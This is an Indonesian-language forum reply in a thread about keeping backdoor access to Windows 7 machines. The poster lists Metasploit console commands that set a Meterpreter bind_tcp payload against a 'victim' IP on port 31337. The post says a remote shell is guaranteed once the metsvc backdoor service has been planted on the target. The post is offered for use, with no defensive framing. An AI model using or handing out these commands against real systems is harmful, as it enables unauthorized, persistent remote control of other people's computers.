[Share] Automatic backdoor running windows 7 ( Maintaining Access )
#8
tambahan dikit dari ane abis praktek .

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/bind_tcp
msf > set RHOST IP_victim
msf > set LPORT 31337
msf > exploit

dijamin shell meterpreter kebuka kalo udah ditanem metsvc server nya . CMIIW Smile:-






Users browsing this thread: 1 Guest(s)